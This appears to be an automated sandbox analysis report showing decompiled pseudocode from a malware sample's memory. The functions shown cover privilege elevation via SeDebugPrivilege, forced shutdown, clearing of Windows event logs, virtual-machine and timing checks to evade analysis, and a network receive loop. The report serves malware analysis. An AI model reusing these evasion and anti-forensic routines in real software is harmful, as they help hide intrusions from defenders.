									 *_t52 =  *(_t68 + 0xfac) + 1;
									__eflags =  *_t52;
									return _t59;
								case 0x11:
									return E10004608(__ecx);
								case 0x12:
									__eax = _a8;
									__edi = 0;
									__esi = _a8 - 2;
									__eax = VirtualAlloc(0, __esi, 0x3000, 4);
									__eflags = __eax;
									_a8 = __eax;
									if(__eax != 0) {
										__ecx = __ebx + 2;
										__eax =  *(__ebx + 1) & 0x000000ff;
										__eax = E10004471(_a8, 0x10027120,  *(__ebx + 1) & 0x000000ff, 0);
										L27:
										__esp = __esp + 0x1c;
										return __eax;
									}
									goto L56;
							}
						}
					}
				}
				L56:
				return _t54;
			}

0x10008220
0x10008225
0x1000822b
0x1000822d
0x100083a4
0x100083a7
0x100083aa
0x100083b7
0x00000000
0x10008408
0x1000840a
0x1000841b
0x1000841e
0x1000842b
0x10008430
0x10008439
0x1000843d
0x10008443
0x00000000
0x00000000
0x00000000
0x00000000
0x10008559
0x1000855d
0x1000855d
0x1000855f
0x10008561
0x10008562
0x10008563
0x10008564
0x00000000
0x00000000
0x1000848b
0x1000848e
0x10008490
0x10008491
0x10008492
0x10008493
0x10008496
0x00000000
0x00000000
0x10008461
0x10008464
0x10008466
0x10008467
0x10008468
0x10008469
0x1000846c
0x00000000
0x00000000
0x1000844a
0x1000844a
0x1000844c
0x1000844d
0x1000844e
0x1000844f
0x10008450
0x00000000
0x00000000
0x10008476
0x10008479
0x1000847b
0x1000847c
0x1000847d
0x1000847e
0x10008481
0x00000000
0x00000000
0x100084a0
0x100084a2
0x100084a3
0x100084a4
0x100084a5
0x100084a6
0x00000000
0x00000000
0x100084ad
0x100084af
0x100084b0
0x100084b1
0x100084b2
0x100084b3
0x00000000
0x00000000
0x100084ba
0x100084bc
0x100084bd
0x100084be
0x100084bf
0x100084c0
0x00000000
0x00000000
0x100084c7
0x100084c9
0x100084ca
0x100084cb
0x100084cc
0x100084cd
0x00000000
0x00000000
0x100084d4
0x100084d6
0x100084d7
0x100084d8
0x100084d9
0x100084da
0x00000000
0x00000000
0x100084e4
0x100084e6
0x100084e7
0x100084e8
0x100084e9
0x100084ea
0x00000000
0x00000000
0x100084f4
0x100084f6
0x100084f7
0x100084f8
0x100084f9
0x100084fa
0x00000000
0x00000000
0x10008504
0x10008506
0x10008507
0x10008508
0x10008509
0x1000850a
0x00000000
0x00000000
0x10008514
0x10008517
0x10008518
0x00000000
0x00000000
0x10008522
0x10008524
0x10008525
0x10008526
0x10008527
0x10008528
0x00000000
0x00000000
0x10008532
0x10008534
0x10008535
0x10008536
0x10008537
0x10008538
0x00000000
0x00000000
0x00000000
0x00000000
0x10008549
0x1000854b
0x1000854c
0x1000854d
0x1000854e
0x1000854f
0x10008455
0x10008455
0x10008456
0x10008457
0x00000000
0x00000000
0x00000000
0x00000000
0x100083b7
0x10008233
0x10008236
0x100083be
0x100083c3
0x100083cd
0x100083d0
0x100083d6
0x100083d8
0x100083db
0x100083e7
0x100083ed
0x100083fb
0x00000000
0x10008400
0x1000823c
0x1000823f
0x10008245
0x00000000
0x10008251
0x00000000
0x00000000
0x100082b0
0x100082b2
0x00000000
0x00000000
0x1000825b
0x00000000
0x00000000
0x1000826a
0x1000825d
0x1000825d
0x1000825d
0x1000825e
0x1000825f
0x00000000
0x00000000
0x10008399
0x00000000
0x00000000
0x1000826e
0x10008270
0x10008271
0x1000827c
0x10008281
0x1000828a
0x1000828e
0x1000828e
0x1000828e
0x10008294
0x10008296
0x10008296
0x00000000
0x00000000
0x100082f9
0x100082fb
0x100082fd
0x100082fe
0x100082ff
0x10008300
0x10008301
0x00000000
0x00000000
0x1000830b
0x1000830d
0x1000830f
0x10008310
0x10008311
0x10008312
0x10008313
0x00000000
0x00000000
0x100082a1
0x00000000
0x00000000
0x100082a5
0x100082a7
0x100082a8
0x100082a9
0x00000000
0x00000000
0x100082c0
0x00000000
0x00000000
0x100082cb
0x00000000
0x00000000
0x100082d6
0x00000000
0x00000000
0x1000831d
0x1000831f
0x10008321
0x10008322
0x10008323
0x10008324
0x10008325
0x00000000
0x00000000
0x100082e1
0x00000000
0x00000000
0x100082ef
0x10008264
0x10008264
0x1000839e
0x00000000
0x00000000
0x1000832f
0x10008331
0x10008333
0x10008334
0x10008335
0x10008338
0x10008569
0x10008569
0x1000856a
0x1000856b
0x10008570
0x10008573
0x10008579
0x1000857d
0x1000857d
0x1000857d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000834c
0x10008356
0x10008358
0x1000835d
0x10008363
0x10008365
0x10008368
0x1000836e
0x1000837a
0x10008388
0x1000838d
0x1000838d
0x00000000
0x1000838d
0x00000000
0x00000000
0x10008245
0x1000823f
0x10008236
0x10008587
0x10008587

APIs

Sleep.KERNEL32(00000064), ref: 10008296
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,Function_00004559,?,00000000,00000000,00000001,?,?,?,?,Function_00004653,?,00000000), ref: 1000835D
memcpy.MSVCRT ref: 10008374
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0000000A), ref: 100083D0
memcpy.MSVCRT ref: 100083E7

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocVirtualmemcpy$Sleep
String ID:
API String ID: 1263862976-0
Opcode ID: bda9371478d4fac50db7bfdbf3d760ed42e0849712fb010b77ccb275af521ac9
Instruction ID: 13742971b84a705920eb5e65bba9637ee1b43bce2d0cc834e0c6dba977cbe1dc
Opcode Fuzzy Hash: bda9371478d4fac50db7bfdbf3d760ed42e0849712fb010b77ccb275af521ac9
Instruction Fuzzy Hash: 67916F751086C0BAF730CA234C4DEAB3E7DEBC7FC1B11841EBA9956049DA769611E732

Uniqueness

Uniqueness Score: -1.00%

Function 10003638, Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10003638(CHAR* _a4) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				void* _t17;
				signed int _t21;

				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0) {
					if(LookupPrivilegeValueA(0, _a4,  &_v16) == 0) {
						goto L1;
					} else {
						_v32.Privileges = _v16.LowPart;
						_v24 = _v16.HighPart;
						_v32.PrivilegeCount = 1;
						_v20 = 2;
						_t21 = AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0);
						asm("sbb eax, eax");
						return  ~_t21 + 1;
					}
				} else {
					L1:
					_t17 = 1;
					return _t17;
				}
			}

0x10003653
0x1000366b
0x00000000
0x1000366d
0x10003672
0x10003678
0x10003688
0x1000368f
0x10003696
0x1000369e
0x100036a2
0x100036a2
0x10003655
0x10003655
0x10003657
0x10003659
0x10003659

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,?,100036B9,SeDebugPrivilege,00000000,00000000,?), ref: 10003644
OpenProcessToken.ADVAPI32(00000000,?,?,100036B9,SeDebugPrivilege,00000000,00000000,?), ref: 1000364B
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,00000000), ref: 10003663
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10003696

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: f1977b7065f3ddbdd5ec9e977ad9fdc8500445da79d1f8eeec6fc7030b6b4336
Instruction ID: 0c2a1e62e26af4e158e681ecea3925c53bcab26389f8f3886fc99013fdf9fde5
Opcode Fuzzy Hash: f1977b7065f3ddbdd5ec9e977ad9fdc8500445da79d1f8eeec6fc7030b6b4336
Instruction Fuzzy Hash: 37011D75A40209BBFB01DFE4CC4ABAE7BBCEB08745F008054F611E61D0D7B1D6448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041123F, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041123F(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E00415985(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E00410D9E(_t15, _t15, _t18, _t19, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E0040A3FC();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x00411242
0x0041124e
0x00411296
0x00411298
0x0041129f
0x00000000
0x004112a1
0x00411255
0x00411259
0x00000000
0x00000000
0x0041125b
0x00411268
0x00000000
0x0041127c
0x0041128b
0x00000000
0x00411293

APIs

Part of subcall function 00415985: GetWindowLongA.USER32 ref: 00415990

GetKeyState.USER32(00000010), ref: 00411263
GetKeyState.USER32(00000011), ref: 0041126C
GetKeyState.USER32(00000012), ref: 00411275
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041128B

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 900ce60a4c45a6b21401fbc6a052ba24f4b52ebcfcb03bdfa010210fbc577c22
Instruction ID: 7e7f712ea3b14e37511a4367657ab5097a8e93718f9a09bb3d4d8c6a0ab0ced3
Opcode Fuzzy Hash: 900ce60a4c45a6b21401fbc6a052ba24f4b52ebcfcb03bdfa010210fbc577c22
Instruction Fuzzy Hash: A6F0E976B9039E26E53037B96C01FFA52944F85BD9F01057AA701FA1F1C9B888C19179

Uniqueness

Uniqueness Score: -1.00%

Function 00402490, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
fileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00402490(signed int __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v24;
				struct _WIN32_FIND_DATAA _v352;
				char _v356;
				CHAR* _v360;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				signed int _t31;
				void* _t37;
				void* _t40;
				char* _t43;
				void* _t45;
				intOrPtr* _t47;
				void* _t55;
				void* _t56;
				intOrPtr _t57;
				signed int _t61;
				signed int _t70;
				void* _t75;
				CHAR* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t82;
				void* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;

				_t70 = __edx;
				_push(0xffffffff);
				_push(E0043BA56);
				_push( *[fs:0x0]);
				_t87 = (_t85 & 0xfffffff8) - 0x158;
				_t29 =  *0x44f5d0; // 0x8e7de579
				_v24 = _t29 ^ _t87;
				_push(_t55);
				_push(_t75);
				_t31 =  *0x44f5d0; // 0x8e7de579
				_push(_t31 ^ _t87);
				 *[fs:0x0] =  &_v16;
				_t37 = E00405460(_t84,  *_a4 - 0x10);
				_t88 = _t87 + 4;
				_v356 = _t37 + 0x10;
				_v8 = 0;
				_t40 = E00403E30( &_v352, 1);
				_v16 = 1;
				_t56 = E00403EB0(_t55, _t75, _t40, _t84);
				_v16 = 0;
				_t43 =  &(_v360[0xfffffffffffffff0]);
				asm("lock xadd [ecx], edx");
				if((_t70 | 0xffffffff) - 1 <= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *( *_t43) + 4))))(_t43);
				}
				if(_t56 != 0) {
					E00403D80(_t56,  &_v356, 0x442b54);
				}
				E00403D80(_t56,  &_v356, "*.*");
				_t76 = _v360;
				_t81 = 0;
				_t45 = FindFirstFileA(_t76,  &_v352);
				_t61 = _v352.dwFileAttributes;
				if(_t45 == 0xffffffff || (_t61 & 0x00000010) == 0) {
					if((_t61 & 0x00000020) != 0) {
						goto L7;
					}
				} else {
					L7:
					_t81 = 1;
				}
				FindClose(_t45);
				_t47 = _t76 - 0x10;
				_v8 = 0xffffffff;
				_t73 = _t47 + 0xc;
				asm("lock xadd [edx], ecx");
				if((_t61 | 0xffffffff) - 1 <= 0) {
					_t73 =  *((intOrPtr*)( *_t47));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t47)) + 4))))(_t47);
				}
				 *[fs:0x0] = _v16;
				_pop(_t77);
				_pop(_t82);
				_pop(_t57);
				return E0042569C(_t81, _t57, _v24 ^ _t88, _t73, _t77, _t82);
			}

APIs

FindFirstFileA.KERNEL32(?,?,*.*), ref: 00402568
FindClose.KERNEL32(00000000), ref: 00402587

Strings

*.*, xrefs: 0040254E

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID: *.*
API String ID: 2295610775-438819550
Opcode ID: 2d7558c4d10db78adde0686bd08c9db947482bd746bb880bf3830aaf75ecc7f0
Instruction ID: cfd477120de95ae1392c7d0fd7c52b7e22c4f6f7addd68228c5d2991b653ee19
Opcode Fuzzy Hash: 2d7558c4d10db78adde0686bd08c9db947482bd746bb880bf3830aaf75ecc7f0
Instruction Fuzzy Hash: DF31BD71204B419FD310CF28CC56B9BB7E8EB85324F444B2AE4A99B3D1DB74A805CB89

Uniqueness

Uniqueness Score: -1.00%

Function 10004627, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004627(int _a4) {

				E1000D096("SeShutdownPrivilege", 1);
				ExitWindowsEx(_a4, 0);
				return E1000D096("SeShutdownPrivilege", 0);
			}

0x10004631
0x1000463d
0x10004652

APIs

Part of subcall function 1000D096: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D0AE
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000D0BE
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1000D0C9
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1000D0D4
Part of subcall function 1000D096: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000D0DE
Part of subcall function 1000D096: GetCurrentProcess.KERNEL32(00000028,?), ref: 1000D0E9
Part of subcall function 1000D096: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1000D12D
Part of subcall function 1000D096: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000D135
Part of subcall function 1000D096: CloseHandle.KERNEL32(?), ref: 1000D144
Part of subcall function 1000D096: FreeLibrary.KERNEL32(00000000), ref: 1000D155
Part of subcall function 1000D096: FreeLibrary.KERNEL32(00000000), ref: 1000D160

ExitWindowsEx.USER32(?,00000000), ref: 1000463D

Strings

SeShutdownPrivilege, xrefs: 1000462C
SeShutdownPrivilege, xrefs: 10004645

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Library$AddressProc$Load$Free$CloseCurrentExitHandleProcessWindows
String ID: SeShutdownPrivilege$SeShutdownPrivilege
API String ID: 3740384223-2417394338
Opcode ID: cc65ccdee26a6b5b886b441d17106ed1ae4e00e793605c6bfa68eb591fa6201d
Instruction ID: 0da07213deb1e05a572b8fc993a9db26fe6fd6b07bc705812b7f874bc1abf980
Opcode Fuzzy Hash: cc65ccdee26a6b5b886b441d17106ed1ae4e00e793605c6bfa68eb591fa6201d
Instruction Fuzzy Hash: BCD0123618C3043EF538A6A0BC07F8CB794DB00B61FB0401BF70C181D6AE9334820169

Uniqueness

Uniqueness Score: -1.00%

Function 1000183D, Relevance: 4.6, APIs: 3, Instructions: 72
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000183D(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _v260;
				void _v264;
				void _v524;
				void _v102924;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				void* _t25;
				void* _t30;
				signed int _t40;
				void* _t57;
				void* _t65;

				_t65 = __fp0;
				E100158E0(0x19208, __ecx);
				_v264 = 1;
				_v260 =  *((intOrPtr*)(_a4 + 0x48));
				_t21 = E1000191E(_a4);
				if(_t21 != 0) {
					while(1) {
						_t40 = 0x41;
						memcpy( &_v524,  &_v264, _t40 << 2);
						_t57 = _t57 + 0xc;
						_t25 =  *0x100273b0(0,  &_v524, 0, 0, 0);
						if(_t25 == 0xffffffff) {
							break;
						}
						if(_t25 <= 0) {
							L6:
							_t21 = E1000191E(_a4);
							if(_t21 != 0) {
								continue;
							} else {
							}
						} else {
							memset( &_v102924, 0, 0x19000);
							_t57 = _t57 + 0xc;
							_t30 =  *0x100273a0( *((intOrPtr*)(_a4 + 0x48)),  &_v102924, 0x19000, 0);
							_t52 = _t30;
							if(_t30 <= 0) {
								break;
							} else {
								E1000181C( &_v102924, _t52);
								E10001922(0x19000, _a4, _t52, 0, _t65,  &_v102924, _t52);
								goto L6;
							}
						}
						goto L9;
					}
					_t21 = E10001B2C(_a4);
				}
				L9:
				return _t21 | 0xffffffff;
			}

0x1000183d
0x10001845
0x10001853
0x1000185d
0x10001863
0x1000186a
0x10001875
0x1000187d
0x10001884
0x10001884
0x10001893
0x1000189c
0x00000000
0x00000000
0x100018a0
0x100018ee
0x100018f1
0x100018f8
0x00000000
0x00000000
0x100018fe
0x100018a2
0x100018ab
0x100018b1
0x100018c3
0x100018c9
0x100018cd
0x00000000
0x100018cf
0x100018d7
0x100018e9
0x00000000
0x100018e9
0x100018cd
0x00000000
0x100018a0
0x10001903
0x10001903
0x10001908
0x1000190f

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001893
memset.MSVCRT ref: 100018AB
recv.WS2_32(?,?,00019000,00000000), ref: 100018C3

Part of subcall function 10001922: __EH_prolog.LIBCMT ref: 10001927
Part of subcall function 10001922: memcmp.MSVCRT ref: 10001954

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: H_prologmemcmpmemsetrecvselect
String ID:
API String ID: 845096623-0
Opcode ID: 5c3ff7316f6dfee5cb485ca0d241435410e4a6404ba55340f6339312f7b03e9b
Instruction ID: b5bd1622c9b73d0408b8acb0fcb17832c9177206b34e69b9ff4c9176cbfd8fe1
Opcode Fuzzy Hash: 5c3ff7316f6dfee5cb485ca0d241435410e4a6404ba55340f6339312f7b03e9b
Instruction Fuzzy Hash: 36218E76500128ABDB21CB64DC98DCF7BACEF493E0F100151F95997195DB71AEC5CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100048B4, Relevance: 4.5, APIs: 3, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100048B4(signed char _a4) {
				char* _v8;
				char* _v12;
				char* _v16;
				void* _t7;
				int _t8;
				void* _t11;
				CHAR** _t14;
				void* _t17;

				_t7 = (_a4 & 0x000000ff) - 1;
				_v16 = "Application";
				_v12 = "Security";
				_v8 = "System";
				if(_t7 == 0) {
					_t14 =  &_v16;
					_t11 = 3;
					do {
						_t8 = OpenEventLogA(0,  *_t14);
						_t17 = _t8;
						if(_t17 != 0) {
							ClearEventLogA(_t17, 0);
							_t8 = CloseEventLog(_t17);
						}
						_t14 =  &(_t14[1]);
						_t11 = _t11 - 1;
					} while (_t11 != 0);
					return _t8;
				}
				return _t7;
			}

0x100048be
0x100048bf
0x100048c6
0x100048cd
0x100048d4
0x100048db
0x100048de
0x100048df
0x100048e3
0x100048e9
0x100048ed
0x100048f2
0x100048f9
0x100048f9
0x100048ff
0x10004902
0x10004902
0x00000000
0x10004907
0x10004909

APIs

OpenEventLogA.ADVAPI32(00000000,10023FC0), ref: 100048E3
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 100048F2
CloseEventLog.ADVAPI32(00000000), ref: 100048F9

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Event$ClearCloseOpen
String ID:
API String ID: 1391105993-0
Opcode ID: d8c11ffd80f2dfc5e702e28777efbb6d98dbb301a4b081688e96ba48619b99d5
Instruction ID: 77245abcbed75dc4d6c2acdc1ff39774722d6272a7b80fc76349e7ea2d389dbf
Opcode Fuzzy Hash: d8c11ffd80f2dfc5e702e28777efbb6d98dbb301a4b081688e96ba48619b99d5
Instruction Fuzzy Hash: 45F02771D0166DBBE712DB48AC48B8E7F74DF44795F41C471F601AA180DB70CA018BD4

Uniqueness

Uniqueness Score: -1.00%

Function 100023DA, Relevance: 3.8, Strings: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E100023DA(void* __ecx) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v28;
				signed char _v32;
				intOrPtr _t28;

				_push(0xffffffff);
				_push(0x1001b400);
				_push(0x10015a2a);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t28;
				_v28 = _t28 - 0xc;
				_v32 = 1;
				_v8 = _v8 & 0x00000000;
				_push(_t13);
				asm("in eax, dx");
				_v32 = 0 == 0x564d5868;
				_v8 = _v8 | 0xffffffff;
				 *[fs:0x0] = _v20;
				return _v32 & 0x000000ff;
			}

0x100023dd
0x100023df
0x100023e4
0x100023ef
0x100023f0
0x100023fd
0x10002400
0x10002404
0x1000240a
0x1000241f
0x10002426
0x1000243a
0x10002445
0x10002450

Strings

hXMV, xrefs: 1000240B
hXMV, xrefs: 10002420
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 100023FA, 1000240A

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij$hXMV$hXMV
API String ID: 0-2392677855
Opcode ID: 7e56f689c1c1557b2216bb32e584ef25fffc2574ea875956409d9c0cafd65910
Instruction ID: 92d849add22f28a6449a9eba48da7302a4f03d3f23b92127fdeaa7c426333ffb
Opcode Fuzzy Hash: 7e56f689c1c1557b2216bb32e584ef25fffc2574ea875956409d9c0cafd65910
Instruction Fuzzy Hash: 6EF0F672E08695AFD704C749DD91BAFFBB8E745B20F348229F160662C1D37959018A60

Uniqueness

Uniqueness Score: -1.00%

Function 10002451, Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10002451(void* __ecx) {
				char _v7;
				signed int _v8;

				_v8 = _v8 & 0x00000000;
				asm("stosw");
				asm("stosb");
				asm("str word [ebp-0x4]");
				if(_v8 != 0 || _v7 != 0x40) {
					return 0;
				} else {
					_push(1);
					return 0;
				}
			}

0x10002455
0x1000245f
0x10002461
0x10002462
0x1000246b
0x1000247b
0x10002473
0x10002473
0x10002477
0x10002477

Strings

@, xrefs: 1000246D

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: e77edeb13e1e5320fc4e7e05f2ce3962be28da0c8fa982ebd0489272e6bf9b9d
Instruction ID: 58f599bd38b56de0619665ef280b747181ec68077e2ef2a1d20fca81bbe98ee7
Opcode Fuzzy Hash: e77edeb13e1e5320fc4e7e05f2ce3962be28da0c8fa982ebd0489272e6bf9b9d
Instruction Fuzzy Hash: 8EE02B72A1828878FB13C371D9067CF7BF49741398F2402D4D141F1080D7F89B48A254

Uniqueness

Uniqueness Score: -1.00%

Function 10002380, Relevance: 1.3, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10002380(void* __eax, intOrPtr _a4) {
				void* _t6;
				void* _t8;

				asm("rdtsc");
				asm("rdtsc");
				if(_t8 - __eax > _a4) {
					_t6 = 1;
					return _t6;
				}
				return 0;
			}

0x10002386
0x10002389
0x10002390
0x10002398
0x00000000
0x10002398
0x00000000

Strings

Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 10002383

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 0-3480391467
Opcode ID: 7279b78ab1bab4c7a59c2c0b6ee8c96ee10a3e09b2ed658189f388052ebaec40
Instruction ID: 5b713ba5fcf68aff6fe09c18812fc2a0e814b243743e901185922f8c48a4d880
Opcode Fuzzy Hash: 7279b78ab1bab4c7a59c2c0b6ee8c96ee10a3e09b2ed658189f388052ebaec40
Instruction Fuzzy Hash: 0BD012363591293DF2108865BDD1ACB7B9CD3425F4B10047AF509C9089C195A5C540F1

Uniqueness

Uniqueness Score: -1.00%

Function 1000239E, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1000239E(void* __ecx, void* __edx) {
				signed int _v8;
				void* _t13;
				signed int _t15;
				signed int _t16;

				_v8 = _v8 & 0x00000000;
				_t13 = 0;
				asm("sidt [esp-0x2]");
				_pop(_t15);
				_v8 = _t15;
				if(_v8 > 0xd0000000) {
					_t13 = 1;
				}
				asm("sgdt [esp-0x2]");
				_t16 = _t15;
				_v8 = _t16;
				if(_v8 > 0xd0000000) {
					_t13 = _t13 + 1;
				}
				return 0 | _t13 != 0x00000000;
			}

0x100023a2
0x100023a6
0x100023a9
0x100023ae
0x100023b0
0x100023bb
0x100023bf
0x100023bf
0x100023c1
0x100023c6
0x100023c8
0x100023ce
0x100023d0
0x100023d0
0x100023d9

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c543e6371526fd629414a4e5558aa8ebf7519434a2d783e4bbead700ed4ee3c5
Instruction ID: d16a4aab5c54aa869a036790b526b61a521b4636888220c4ac0cfcd7ad94080d
Opcode Fuzzy Hash: c543e6371526fd629414a4e5558aa8ebf7519434a2d783e4bbead700ed4ee3c5
Instruction Fuzzy Hash: 91E01275909205F7FB0CCB66950279FB6F4EB45790F30D06ED102A2280D7B85E449515

